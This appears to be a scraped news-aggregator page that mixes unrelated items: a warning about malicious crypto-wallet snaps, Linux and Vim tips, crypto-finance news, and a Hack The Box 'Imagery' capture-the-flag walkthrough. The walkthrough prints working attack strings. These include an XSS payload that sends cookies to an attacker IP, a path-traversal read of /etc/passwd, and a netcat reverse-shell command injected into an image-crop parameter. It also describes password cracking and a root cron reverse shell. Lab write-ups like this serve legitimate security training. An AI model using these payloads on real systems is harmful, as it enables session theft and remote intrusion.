An anonymous reader shared this article from the blog Linuxiac
In a blog post, Alan Pope, a longtime Ubuntu community figure and former Canonical employee who remains an active Snap publisher... [warns of] a persistent campaign of malicious snaps impersonating cryptocurrency wallet applications. These fake apps typically mimic well-known projects such as Exodus, Ledger Live, or Trust Wallet, prompting users to enter wallet recovery phrases, which are then transmitted to attackers, resulting in drained funds.
The perpetrators had originally used similar-looking characters from other alphabets to mimic other app listings, then began uploading "revisions" to other innocuous-seeming (approved) apps that would transform their original listing into that of a fake crypto wallet app.
But now they're re-registering expired domains to take over existing Snap Store accounts, which Pope calls "a significant escalation..."
I worked for Canonical between 2011 and 2021 as an Engineering Manager, Community Manager, and Developer Advocate. I was a strong advocate for snap packages and the Snap Store. While I left the company nearly five years ago, I still maintain nearly 50 packages in the Snap Store, with thousands of users... Personally, I want the Snap Store to be successful, and for users to be confident that the packages they install are trustworthy and safe.
Currently, that confidence isn't warranted, which is a problem for desktop Linux users who install snap packages. I report every bad snap I encounter, and I know other security professionals do the same β even though doing so results in no action for days sometimes... To be clear: none of this should be seen as an attack on the Snap Store, Canonical, or the engineers working on these problems. I'm raising awareness of an issue that exists, because I want it fixed... But pretending there isn't a problem helps nobody.
Want to take your Vim game to the next level? From my time using Vim, I've learned many neat tips and tricks that have saved me tons of time and headaches while editing with Vim. I'm sharing some of my top tips in this guide so you can incorporate them into your workflow.
Netflix pioneered the idea of streaming services making their own original content, exclusive to each platform. In general, this has worked well, and shows like Stranger Things have become major tentpole hits.
I used to treat my Linux app menu like a forgotten drawer. I rarely opened it, only to switch to my terminal a bit later. Then I found Ulauncher. It quietly replaced my start menu, app grid, and desktop shortcuts. Once I got used to it, I wondered why I ever clicked through menus in the first place.
The United Kingdom has selected seven defense companies to develop prototype uncrewed aircraft that will operate alongside Apache attack helicopters, advancing a British Army program aimed at integrating autonomous systems into frontline aviation operations. The UK Ministry of Defence confirmed that the companies were invited to the next stage of Project NYX, a program designed [β¦]
In this write-up, we will explore the βImageryβ machine from Hack The Box, categorised as a Medium difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
Objective:
The goal of this walkthrough is to complete the βImageryβ machine from Hack The Box by achieving the following objectives:
User Flag:
After gaining an initial foothold through weaknesses in the web application, access is gradually expanded beyond a standard user account. By leveraging exposed application data and mismanaged credentials, lateral movement becomes possible within the system. This progression ultimately leads to access to a regular system user account, where the user flag can be retrieved, marking the successful completion of the first objective.
Root Flag:
With user-level access established, further analysis reveals misconfigured privileges and trusted system utilities that can be abused. By carefully interacting with these elevated permissions and understanding how system-level automation is handled, full administrative control of the machine is achieved. This final escalation allows access to the root account and the retrieval of the root flag, completing the machine compromise.
Enumerating the Imagery Machine
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
Port 22 (SSH): SSH is available for remote access and may be used later if valid credentials are obtained.
Port 8000 (HTTP): A Python-based web application is exposed on port 8000 and represents the primary attack surface for further enumeration.
Web Enumeration:
Web Application Exploration:
Features the appβs slogan βCapture & Cherish Every Momentβ in large white text, followed by a description: βYour personal online gallery, designed for simplicity and beauty. Upload, organise, and relive your memories with ease.β Below that, a white section titled βPowerful Features at Your Fingertipsβ with three icons (a landscape image frame, a padlock for security, and a rocket for speed/performance). The navigation bar at the top includes βHome,β βLogin,β and βRegister.β
Application Overview
Centred white form on blue background titled βRegisterβ. Fields: βEmail IDβ (placeholder: βEnter your email IDβ) and βPasswordβ (placeholder: βEnter your passwordβ with eye icon for visibility). Blue βRegisterβ button. ja
Fields pre-filled: βEmail IDβ as βdark@imagery.htbβ and masked βPasswordβ. Blue βRegisterβ button.
Similar to register, titled βLoginβ. Fields pre-filled: βEmail IDβ as βdark@imagery.htbβ and masked βPasswordβ. Blue βLoginβ button, plus βDonβt have an account? Register hereβ link. Top nav: βHomeβ, βLoginβ, βRegisterβ.
White background with title βYour Image Galleryβ. A card message: βNo images uploaded yet. Go to the βUploadβ page to add some!β Logged-in nav: βHomeβ, βGalleryβ, βUploadβ, βLogoutβ (red button).
Client-side JavaScript source code fetching and displaying admin bug reports from /admin/bug_reports with error handling and UI rendering logic.
JavaScript function handleDownloadUserLog redirects to /admin/get_system_log with a crafted log_identifier parameter based on username.
404 Not Found response when accessing the root /admin endpoint directly.
JSON access denied response (βAdministrator privileges requiredβ) when trying to access /admin/users as a non-admin user.
405 Method Not Allowed error on GET request to /report_bug, indicating the endpoint exists but requires a different HTTP method (likely POST).
Stored Cross-Site Scripting in Bug Reporting Feature on Imagery Machine
βReport a Bugβ form pre-filled with βbugNameβ: βdarkβ and the same XSS cookie-stealing payload in Bug Details, ready for submission.
Terminal session as user βdark@parrotβ running a local HTTP server (sudo python3 -m http.server 80) in the ~/Documents/htb/imagery directory to serve files/listen for requests on port 80.
Burp Suite capture of a successful POST to /report_bug, submitting JSON with βbugNameβ: βdarkβ and XSS payload in βbugDetailsβ (<img src=x onerror=βdocument.location=βhttp://10.10.14.133:80/?cookie=β+document.cookieβ>), response confirms submission with admin review message.
The response of successful POST to /report_bug, submitting an XSS payload in bugDetails to exfiltrate cookies via redirect to the attackerβs server.
Burp Suite capture of GET request to /auth_status returning JSON with logged-in user details (username βdark@imagery.htbβ, isAdmin false).
Local Python HTTP server log showing incoming request from target (10.129.3.10) with stolen admin session cookie in query parameter, plus 404 for favicon.
Burp Suite capture of GET to /admin/ endpoint returning standard 404 Not Found HTML error page.
Successful GET to /admin/users with stolen admin cookie returning JSON user list (admin with isAdmin:true, testuser with isAdmin:false).
JavaScript source snippet of handleDownloadUserLog function redirecting to /admin/get_system_log with the encoded log_identifier parameter.
Local File Inclusion Leading to Credential Disclosure
Failed LFI attempt on non-existent path returning 500 Internal Server Error with βError reading file: 404 Not Foundβ.
Successful LFI exploitation via /admin/get_system_log retrieving /etc/passwd contents through path traversal payload β../../../../../../etc/passwdβ.
Admin Panel interface (accessed with hijacked session) showing User Management with admin and testuser entries, plus empty Submitted Bug Reports section.
Retrieved db.json file contents via /admin/get_system_log path traversal, exposing user records with MD5-hashed passwords for admin and testuser, alongside an empty bug_reports array.
LFI retrieval of config.py source code exposing app constants like DATA_STORE_PATH=βdb.jsonβ, upload folders, and allowed extensions.
CrackStation online tool cracking the MD5 hash β2c65c8d7bfbca32a3ed42596192384f6β to plaintext βiambatmanβ.
Terminal output of failed SSH attempt as testuser@10.129.3.10 with publickey authentication denied.
Authenticating to the Imagery Application Using TestUserβs Credentials
Login page with Email ID pre-filled as βtestuser@imagery.htbβ and masked password field.
Empty Gallery page for logged-in user stating βNo images uploaded yet. Go to the βUploadβ page to add some!β
Upload New Image form with βlips.pngβ selected (max 1MB, allowed formats listed), optional title/description, group βMy Imagesβ, uploading as Account ID e5f6g7h8.
Achieving Shell Access via Remote Code Execution
Gallery view showing single uploaded image βlipsβ (red lips icon) with open context menu offering Edit Details, Convert Format, Transform Image, Delete Metadata, Download, and Delete.
Visual Image Transformation modal in crop mode with selectable box over the red lips image, parameters set to x:0 y:0 width:193 height:172.
Successful Burp POST to /apply_visual_transform with valid crop params returning new transformed image URL in /uploads/admin/transformed/.
Burp capture of POST to /apply_visual_transform with invalid crop βxβ:βidβ parameter resulting in 500 error (βinvalid argument for option β-crop'β).
Burp capture of POST to /apply_visual_transform injecting βcat /etc/passwdβ via crop βxβ parameter, resulting in 500 error exposing command output snippet.
Attacker terminal running netcat listener on port 9007 (nc -lvnp 9007).
Burp capture of POST to /apply_visual_transform with reverse shell payload in crop βxβ parameter (βrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.133 9007 >/tmp/fβ).
Successful reverse shell connection from target (10.129.3.10) to attacker listener on port 9007, landing as web@Imagery.
Directory listing of /var/backup showing an encrypted backup file web_20250806_120723.zip.aes.
Directory listing of /var/backups showing multiple compressed APT/dpkg state archives (.gz files).
Target starting Python HTTP server on port 9007 to serve the encrypted backup file.
Wget successfully downloading the encrypted backup file web_20250806_120723.zip.aes (22MB) from the targetβs HTTP server on port 9007.
File command confirming web_20250806_120723.zip.aes is AES-encrypted data created by pyAesCrypt 6.1.1.
Attempt to run dpyAesCrypt.py failing with ModuleNotFoundError for βpyAesCryptβ (case-sensitive import issue).
Successful pip3 user installation of pyaescrypt-6.1.1 package.
Failed execution of dpyAesCrypt.py due to ModuleNotFoundError for βtermcolorβ (missing import dependency).
Successful pip3 user installation of termcolor-3.3.0 package.
Custom pyAesCrypt brute-forcer discovering password βbestfriendsβ early in the wordlist.
Successful decryption of the AES backup using βbestfriendsβ, outputting the original web_20250806_120723.zip.
The cunzip extracting the decrypted backup archive, revealing full app source (api_*.py, app.py, config.py, db.json, utils.py), templates, system_logs, env, and compiled pycache files.
cat of decrypted db.json revealing user database with admin (hashed password), testuser (βiambatmanβ), and mark (another hashed password).
CrackStation results cracking MD5 hashes to βiambatmanβ, βsupersmashβ, and βspiderweb1234β (one unknown).
Successful su to mark using password βsupersmashβ, confirming uid/gid 1002.
Python one-liner (python3 -c βimport pty;pty.spawn(β/bin/bashβ)β) to spawn an interactive bash shell.
ls -al in /home/mark showing files including user.txt (likely containing the flag).
We can read the user flag by typing the βcat user.txtβ command
Escalate to Root Privileges Access to Imagery Machine
Privilege Escalation:
sudo -l reveals that user mark can run /usr/local/bin/charcol as root without a password (NOPASSWD).
charcol help output describing the CLI tool for encrypted backups, with commands (shell, help) and options (-quiet, -R for reset).
Failed charcol shell passphrase attempts (βbestfriendβ, βsupermashβ, βsupersmashβ) resulting in lockout after multiple errors.
sudo charcol -R resetting application password to default (βno passwordβ mode) after system password verification.
sudo charcol -R resetting application password to default (βno passwordβ mode) after system password verification.
Repeated sudo charcol -R successfully resetting to no password mode.
charcol interactive shell entry after initial setup, displaying ASCII logo and info message.
charcol help output explaining backup/fetch commands and βauto addβ for managing automated (root) cron jobs, with security warnings.
Attacker terminal running netcat listener on port 9007 in preparation for reverse shell.
Successful βauto addβ command creating a root cron job with reverse shell payload to attacker (10.10.14.133:9007), verified with system password βsupersmashβ.
Successful privilege escalation to root via a malicious cron job triggered a reverse shell, followed by reading the root flag from /root/root.txt
Major cryptocurrency exchanges are reportedly positioning to bring tokenized stock trading onto the blockchain, signaling a renewed push to merge traditional financial markets with digital assets.Β
According to a report published Friday by The Information, platforms such as Binance are exploring ways to offer crypto tokens that track publicly listed US companies, effectively creating new channels for equity exposure through tokenized instruments.
Binance And OKX Explore Tokenized Stocks
The report says Binance is considering reintroducing stock tokens to its platform, several years after pulling similar products in 2021 amid regulatory uncertainty.Β
The plan, cited by a person familiar with the matter, reflects a broader shift within the industry as exchanges revisit tokenized equities under evolving market and compliance frameworks.Β
OKX is also said to be evaluating the possibility of offering tokenized stocks, according to Haider Rafique, the companyβs global managing partner and chief marketing officer.
Binance has framed the move as part of its long-term strategy to connect traditional finance with the crypto ecosystem. In a statement to CoinDesk, a Binance spokesperson said the exchange is focused on expanding user choice while maintaining strict regulatory standards.Β
The company noted that it began supporting tokenized real-world assets (RWAs) last year and recently launched what it described as the first regulated traditional finance perpetual contracts settled in stablecoins.Β
Exploring tokenized equities, the spokesperson said, is a natural progression as Binance continues to build infrastructure, collaborate with established financial institutions, and develop new products for users and the wider industry.
Binance and OKX are not alone in this effort. Several major crypto firms, including Robinhood (HOOD), Gemini (GEMI), and Kraken, have already rolled out tokenized stock offerings in Europe. Meanwhile, Robinhood and blockchain startup Dinari are seeking regulatory approval to introduce similar products in the United States.
Tokenized Shares Gain Increased Interest
Robinhood took a significant step in June of last year when it launched trading in tokens linked to publicly listed companies and announced plans to expand into tokenized shares of private firms.Β
As part of the rollout, the company distributed tokens pegged to OpenAI. According to Robinhoodβs terms and conditions, those tokens function as derivative contracts backed by the firmβs ownership of fund units in a special-purpose vehicle that holds OpenAI convertible notes.Β
Coinbase (COIN), on the other hand, is reportedly in discussions with the US Securities and Exchange Commission (SEC) about launching tokenized securities that would grant investors the same legal rights and benefits as conventional shares.Β
Several issuers involved in the space say they are closely adhering to established rules around securities law, anti-money laundering requirements, bankruptcy protections, and investor safeguards.
Industry leaders argue that, when structured properly, tokenization can strengthen rather than weaken investor protections. Ian De Bode, chief strategy officer at Ondo Finance, said that a careful approach to tokenized securities can enhance safeguards while unlocking efficiencies that traditional markets struggle to achieve.
Featured image from OpenArt, chart from TradingView.comΒ
The Servo project developers have announced the release of version 0.0.4 of its Servo browser engine, bringing with it some crucial upgrades in the long-term goal of supporting a full browser experience.
For years, cybersecurity strategy revolved around a simple goal: keep attackers out. That mindset no longer matches reality. Todayβs threat landscape assumes compromise. Adversaries do not just encrypt data and demand payment. They exfiltrate it, resell it, reuse it, and weaponize it long after the initial breach. As we look toward 2026, cyber resilience, not..
Researchers with Cyata and BlueRock uncovered vulnerabilities in MCP servers from Anthropic and Microsoft, feeding ongoing security worries about MCP and other agentic AI tools and their dual natures as both key parts of the evolving AI world and easy targets for threat actors.
When ransomware cripples a businessβs systems or stealthy malware slips past defenses, the first instinct is to get everything back online as quickly as possible. That urgency is understandable β Cybersecurity Ventures estimates ransomware damage costs $156 million per day. But businesses cannot let speed overshadow the more pressing need to understand exactly what happened,..
The world of Linux software is hard to navigate, but with there are a lot of good ones worth checking out if you know where to look. Have a look at this text drawing app, packet analyzer, and Wikipedia browser.
A great documentary is good to watch any time of the week, but if you like to settle in on the weekend, too, I've got a trio of good ones on Netflix for you that I think you'll like.
The iPhone 18 Pro may shrink Dynamic Island by about 35%, based on a leakerβs millimeter measurements. If confirmed, it could make the front look cleaner and force subtle UI tweaks.
If you live in the United States, this weekend is the perfect opportunity to crush that Netflix series you've always wanted to watch. Nearly 30 states will get hit with snow, sleet, and freezing rain. As much as I love to get outside, the better move right now is to stay indoors and fire up some television.
Reports say Capital One will buy stablecoin fintech Brex for $5.15 billion in a deal that mixes cash and stock. According to the bankβs release, roughly half of the price will be paid in cash and the other half in Capital One stock.
Regulators must still sign off. The two companies expect the transaction to finish by mid-2026, though that timing could shift if approvals take longer.
Brex Brings Cards, Software β And Stablecoin Plans
Brex began as a corporate card and expense tool for startups and has added services for larger firms.
Reports note the company moved quickly into payment tech last year when it announced plans to offer native stablecoin payments, letting customers send and accept dollar-pegged tokens with automatic conversion back into USD balances.
That bit of tech is a major part of why the deal matters to a bank that wants faster settlement options.
A Mix Of Old And New
This is not just about software. It is also a play for customers. Brex runs business accounts, serves big names in tech, and has built a set of tools that many businesses use daily.
Some of those clients moved business deposits to Brex after the 2023 banking turmoil, and those relationships are part of the package Capital One is buying.
The price tag looks smaller than Brexβs peak private valuation years ago, which shows how venture valuations have reset across the sector.
Why This Matters For Payments
Banks have been testing token-based rails and faster settlement for a while. By folding Brex into its operations, Capital One gains a ready platform that already experiments with stablecoin rails.
Real-time settlement for businesses can lower friction and could cut the waiting time for funds to clear. At the same time, regulators in the US and abroad are paying closer attention to token projects, so the new setup will run under tighter scrutiny.
Stablecoins have drawn growing attention across traditional finance after Congress approved major rules for the tokens last year.
Based on data from Coingecko, the total value of stablecoins has climbed over 18% to an all-time high of $315 billion since the GENIUS Act was passed in July 2025. USDT takes the lion share of the overall stablecoin market.
Leadership And Market Reaction
Reports note that Pedro Franceschi, Brexβs CEO, will continue to lead the unit after the sale, now inside Capital One.
Investors reacted calmly overall; Capital Oneβs shares dipped early but were supported by robust quarterly results announced at the same time. That earnings strength helped soften any sharp market moves.
Featured image from YouHodler, chart from TradingView
Login
